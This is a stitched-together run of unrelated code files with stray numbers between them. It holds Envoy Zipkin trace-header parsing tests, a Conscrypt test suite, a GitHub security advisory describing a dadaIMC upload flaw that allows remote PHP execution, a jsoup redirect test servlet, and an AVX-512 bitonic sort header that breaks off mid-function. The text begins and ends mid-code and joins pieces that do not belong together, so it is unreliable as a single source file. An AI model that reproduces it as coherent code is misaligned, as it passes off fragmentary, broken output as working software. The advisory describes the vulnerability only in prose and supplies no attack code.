ExtractorException, "Invalid input: too long"); EXPECT_FALSE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{}-1-{}a", trace_id_high, trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: too long"); } } TEST(ZipkinSpanContextExtractorTest, Empty) { Http::TestRequestHeaderMapImpl request_headers{{"b3", ""}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: empty"); } TEST(ZipkinSpanContextExtractorTest, InvalidInput) { { Http::TestRequestHeaderMapImpl request_headers{ {"X-B3-TraceId", trace_id_high + trace_id.substr(0, 15) + "!"}, {"X-B3-SpanId", span_id}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, fmt::format("Invalid traceid_high {} or tracid {}", trace_id_high, trace_id.substr(0, 15) + "!")); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}!{}-{}", trace_id.substr(0, 15), trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE( extractor.extractSpanContext(true), ExtractorException, fmt::format("Invalid input: invalid trace id high {}!", trace_id.substr(0, 15))); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}!-{}", trace_id, trace_id.substr(0, 15), span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE( extractor.extractSpanContext(true), ExtractorException, fmt::format("Invalid input: invalid trace id {}!", trace_id.substr(0, 15))); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}!-{}", trace_id.substr(0, 15), span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE( extractor.extractSpanContext(true), ExtractorException, fmt::format("Invalid input: invalid trace id {}!", trace_id.substr(0, 15))); } { Http::TestRequestHeaderMapImpl request_headers{{"b3", fmt::format("{}!{}", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: not exists span id"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}!", trace_id, span_id.substr(0, 15))}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE( extractor.extractSpanContext(true), ExtractorException, fmt::format("Invalid input: invalid span id {}!", span_id.substr(0, 15))); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}!0", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: not exists sampling field"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-c", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: invalid sampling flag c"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-d!{}", trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-d-{}!", trace_id, span_id, parent_id.substr(0, 15))}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE( extractor.extractSpanContext(true), ExtractorException, fmt::format("Invalid input: invalid parent id {}!", parent_id.substr(0, 15))); } { Http::TestRequestHeaderMapImpl request_headers{{"b3", "-"}}; SpanContextExtractor extractor(request_headers); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true})); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: invalid sampling flag -"); } } TEST(ZipkinSpanContextExtractorTest, Truncated) { { Http::TestRequestHeaderMapImpl request_headers{{"b3", "-1"}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{{"b3", "1-"}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{{"b3", "1-"}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{{"b3", trace_id.substr(0, 15)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{{"b3", trace_id}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{{"b3", trace_id + "-"}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}", trace_id.substr(0, 15), span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}", trace_id, span_id.substr(0, 15))}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-1-", trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-1-{}", trace_id, span_id, parent_id.substr(0, 15))}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}-{}-{}{}", trace_id, span_id, trace_id, trace_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); } } } // namespace Zipkin } // namespace Tracers } // namespace Extensions } // namespace Envoy
6,991
1,085
package org.conscrypt; import static org.conscrypt.TestUtils.installConscryptAsDefaultProvider; import org.junit.BeforeClass; import org.junit.runner.RunWith; import org.junit.runners.Suite; @RunWith(Suite.class) @Suite.SuiteClasses({ AddressUtilsTest.class, ApplicationProtocolSelectorAdapterTest.class, ClientSessionContextTest.class, ConscryptSocketTest.class, ConscryptTest.class, DuckTypedPSKKeyManagerTest.class, FileClientSessionCacheTest.class, NativeCryptoTest.class, NativeRefTest.class, NativeSslSessionTest.class, OpenSSLKeyTest.class, OpenSSLX509CertificateTest.class, PlatformTest.class, ServerSessionContextTest.class, SSLUtilsTest.class, TestSessionBuilderTest.class, }) public class ConscryptOpenJdkSuite { @BeforeClass public static void setupStatic() { installConscryptAsDefaultProvider(); } }
279
892
<reponame>westonsteimel/advisory-database-github { "schema_version": "1.2.0", "id": "GHSA-xfvx-2xc3-9vrp", "modified": "2022-05-01T07:38:50Z", "published": "2022-05-01T07:38:50Z", "aliases": [ "CVE-2006-6511" ], "details": "dadaIMC .99.3 uses an insufficiently restrictive FilesMatch directive in the installed .htaccess file, which allows remote attackers to execute arbitrary PHP code by uploading files whose names contain (1) feature, (2) editor, (3) newswire, (4) otherpress, (5) admin, (6) pbook, (7) media, or (8) mod, which are processed as PHP file types (application/x-httpd-php).", "severity": [ ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6511" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30862" }, { "type": "WEB", "url": "http://bugs.dadaimc.org/view.php?id=191" }, { "type": "WEB", "url": "http://secunia.com/advisories/23305" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2006/4977" } ], "database_specific": { "cwe_ids": [ ], "severity": "MODERATE", "github_reviewed": false } }
569
8,767
package org.jsoup.integration.servlets; import org.jsoup.integration.TestServer; import javax.servlet.http.Cookie; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; public class RedirectServlet extends BaseServlet { public static final String Url = TestServer.map(RedirectServlet.class); public static final String LocationParam = "loc"; public static final String CodeParam = "code"; public static final String SetCookiesParam = "setCookies"; private static final int DefaultCode = HttpServletResponse.SC_MOVED_TEMPORARILY; @Override protected void doGet(HttpServletRequest req, HttpServletResponse res) { String location = req.getParameter(LocationParam); if (location == null) location = ""; int intCode = DefaultCode; String code = req.getParameter(CodeParam); if (code != null) intCode = Integer.parseInt(code); if (req.getParameter(SetCookiesParam) != null) { res.addCookie(new Cookie("token", "<PASSWORD>")); res.addCookie(new Cookie("uid", "jhy")); } res.setHeader("Location", location); res.setStatus(intCode); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse res) { doGet(req, res); } }
513
9,402
<reponame>pyracanda/runtime // Licensed to the .NET Foundation under one or more agreements. // The .NET Foundation licenses this file to you under the MIT license. ///////////////////////////////////////////////////////////////////////////// //// // This file was auto-generated by a tool at 2020-07-21 14:05:39 // // It is recommended you DO NOT directly edit this file but instead edit // the code-generator that generated this source file instead. ///////////////////////////////////////////////////////////////////////////// #ifndef BITONIC_SORT_AVX512_INT32_T_H #define BITONIC_SORT_AVX512_INT32_T_H #ifdef __GNUC__ #ifdef __clang__ #pragma clang attribute push (__attribute__((target("avx512f"))), apply_to = any(function)) #else #pragma GCC push_options #pragma GCC target("avx512f") #endif #endif #include <immintrin.h> #include "bitonic_sort.h" #define i2d _mm512_castsi512_pd #define d2i _mm512_castpd_si512 #define i2s _mm512_castsi512_ps #define s2i _mm512_castps_si512 #define s2d _mm512_castps_pd #define d2s _mm521_castpd_ps namespace vxsort { namespace smallsort { template<> struct bitonic<int32_t, AVX512> { static const int N = 16; static constexpr int32_t MAX = std::numeric_limits<int32_t>::Max(); public: static INLINE void sort_01v_ascending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_ABCD); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); s = _mm512_permutex_epi64(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xF0F0, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); s = _mm512_shuffle_i64x2(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_ABCD); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xFF00, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xF0F0, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); } static INLINE void sort_01v_merge_ascending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_i64x2(d01, d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xFF00, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xF0F0, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xCCCC, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0xAAAA, s, d01); } static INLINE void sort_01v_descending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_ABCD); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); s = _mm512_permutex_epi64(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x0F0F, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); s = _mm512_shuffle_i64x2(_mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _mm512_shuffle_epi32(d01, _MM_PERM_ABCD), _MM_PERM_ABCD); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x00FF, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x0F0F, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); } static INLINE void sort_01v_merge_descending(__m512i& d01) { __m512i min, s; s = _mm512_shuffle_i64x2(d01, d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x00FF, s, d01); s = _mm512_permutex_epi64(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x0F0F, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_BADC); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x3333, s, d01); s = _mm512_shuffle_epi32(d01, _MM_PERM_CDAB); min = _mm512_min_epi32(s, d01); d01 = _mm512_mask_max_epi32(min, 0x5555, s, d01); } static INLINE void sort_02v_ascending(__m512i& d01, __m512i& d02) { __m512i tmp; sort_01v_ascending(d01); sort_01v_descending(d02); tmp = d02; d02 = _mm512_max_epi32(d01, d02); d01 = _mm512_min_epi32(d01, tmp); sort_01v_merge_ascending(d01); sort_01v_merge_ascending(d02); } static INLINE void sort_02v_descending(__m512i& d01, __m512i& d02) { __m512i tmp; sort_01v_descending(d01); sort_01v_ascending(d02); tmp = d02; d02 = _mm512_max_epi32(d01, d02); d01 = _mm512_min_epi32(d01, tmp); sort_01v_merge_descending(d01); sort_01v_merge_descending(d02); } static INLINE void sort_02v_merge_ascending(__m512i& d01, __m512i& d02) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d02, d01); d02 = _mm512_max_epi32(d02, tmp); sort_01v_merge_ascending(d01); sort_01v_merge_ascending(d02); } static INLINE void sort_02v_merge_descending(__m512i& d01, __m512i& d02) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d02, d01); d02 = _mm512_max_epi32(d02, tmp); sort_01v_merge_descending(d01); sort_01v_merge_descending(d02); } static INLINE void sort_03v_ascending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; sort_02v_ascending(d01, d02); sort_01v_descending(d03); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); sort_02v_merge_ascending(d01, d02); sort_01v_merge_ascending(d03); } static INLINE void sort_03v_descending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; sort_02v_descending(d01, d02); sort_01v_ascending(d03); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); sort_02v_merge_descending(d01, d02); sort_01v_merge_descending(d03); } static INLINE void sort_03v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); sort_02v_merge_ascending(d01, d02); sort_01v_merge_ascending(d03); } static INLINE void sort_03v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); sort_02v_merge_descending(d01, d02); sort_01v_merge_descending(d03); } static NOINLINE void sort_04v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; sort_02v_ascending(d01, d02); sort_02v_descending(d03, d04); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); tmp = d04; d04 = _mm512_max_epi32(d01, d04); d01 = _mm512_min_epi32(d01, tmp); sort_02v_merge_ascending(d01, d02); sort_02v_merge_ascending(d03, d04); } static NOINLINE void sort_04v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; sort_02v_descending(d01, d02); sort_02v_ascending(d03, d04); tmp = d03; d03 = _mm512_max_epi32(d02, d03); d02 = _mm512_min_epi32(d02, tmp); tmp = d04; d04 = _mm512_max_epi32(d01, d04); d01 = _mm512_min_epi32(d01, tmp); sort_02v_merge_descending(d01, d02); sort_02v_merge_descending(d03, d04); } static NOINLINE void sort_04v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); tmp = d02; d02 = _mm512_min_epi32(d04, d02); d04 = _mm512_max_epi32(d04, tmp); sort_02v_merge_ascending(d01, d02); sort_02v_merge_ascending(d03, d04); } static NOINLINE void sort_04v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d03, d01); d03 = _mm512_max_epi32(d03, tmp); tmp = d02; d02 = _mm512_min_epi32(d04, d02); d04 = _mm512_max_epi32(d04, tmp); sort_02v_merge_descending(d01, d02); sort_02v_merge_descending(d03, d04); } static INLINE void sort_05v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; sort_04v_ascending(d01, d02, d03, d04); sort_01v_descending(d05); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_01v_merge_ascending(d05); } static INLINE void sort_05v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_01v_ascending(d05); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_01v_merge_descending(d05); } static INLINE void sort_05v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_01v_merge_ascending(d05); } static INLINE void sort_05v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_01v_merge_descending(d05); } static INLINE void sort_06v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06) { __m512i tmp; sort_04v_ascending(d01, d02, d03, d04); sort_02v_descending(d05, d06); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_02v_merge_ascending(d05, d06); } static INLINE void sort_06v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_02v_ascending(d05, d06); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_02v_merge_descending(d05, d06); } static INLINE void sort_06v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_02v_merge_ascending(d05, d06); } static INLINE void sort_06v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_02v_merge_descending(d05, d06); } static INLINE void sort_07v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; sort_04v_ascending(d01, d02, d03, d04); sort_03v_descending(d05, d06, d07); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_03v_merge_ascending(d05, d06, d07); } static INLINE void sort_07v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_03v_ascending(d05, d06, d07); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_03v_merge_descending(d05, d06, d07); } static INLINE void sort_07v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_03v_merge_ascending(d05, d06, d07); } static INLINE void sort_07v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_03v_merge_descending(d05, d06, d07); } static NOINLINE void sort_08v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; sort_04v_ascending(d01, d02, d03, d04); sort_04v_descending(d05, d06, d07, d08); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); tmp = d08; d08 = _mm512_max_epi32(d01, d08); d01 = _mm512_min_epi32(d01, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_04v_merge_ascending(d05, d06, d07, d08); } static NOINLINE void sort_08v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; sort_04v_descending(d01, d02, d03, d04); sort_04v_ascending(d05, d06, d07, d08); tmp = d05; d05 = _mm512_max_epi32(d04, d05); d04 = _mm512_min_epi32(d04, tmp); tmp = d06; d06 = _mm512_max_epi32(d03, d06); d03 = _mm512_min_epi32(d03, tmp); tmp = d07; d07 = _mm512_max_epi32(d02, d07); d02 = _mm512_min_epi32(d02, tmp); tmp = d08; d08 = _mm512_max_epi32(d01, d08); d01 = _mm512_min_epi32(d01, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_04v_merge_descending(d05, d06, d07, d08); } static NOINLINE void sort_08v_merge_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); tmp = d04; d04 = _mm512_min_epi32(d08, d04); d08 = _mm512_max_epi32(d08, tmp); sort_04v_merge_ascending(d01, d02, d03, d04); sort_04v_merge_ascending(d05, d06, d07, d08); } static NOINLINE void sort_08v_merge_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08) { __m512i tmp; tmp = d01; d01 = _mm512_min_epi32(d05, d01); d05 = _mm512_max_epi32(d05, tmp); tmp = d02; d02 = _mm512_min_epi32(d06, d02); d06 = _mm512_max_epi32(d06, tmp); tmp = d03; d03 = _mm512_min_epi32(d07, d03); d07 = _mm512_max_epi32(d07, tmp); tmp = d04; d04 = _mm512_min_epi32(d08, d04); d08 = _mm512_max_epi32(d08, tmp); sort_04v_merge_descending(d01, d02, d03, d04); sort_04v_merge_descending(d05, d06, d07, d08); } static INLINE void sort_09v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_descending(d09); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); sort_08v_merge_ascending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_merge_ascending(d09); } static INLINE void sort_09v_descending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09) { __m512i tmp; sort_08v_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_ascending(d09); tmp = d09; d09 = _mm512_max_epi32(d08, d09); d08 = _mm512_min_epi32(d08, tmp); sort_08v_merge_descending(d01, d02, d03, d04, d05, d06, d07, d08); sort_01v_merge_descending(d09); } static INLINE void sort_10v_ascending(__m512i& d01, __m512i& d02, __m512i& d03, __m512i& d04, __m512i& d05, __m512i& d06, __m512i& d07, __m512i& d08, __m512i& d09, __m512i& d10) { __m512i tmp; sort_08v_ascending(d01, d02, d03, d04, d05, d06, d07, 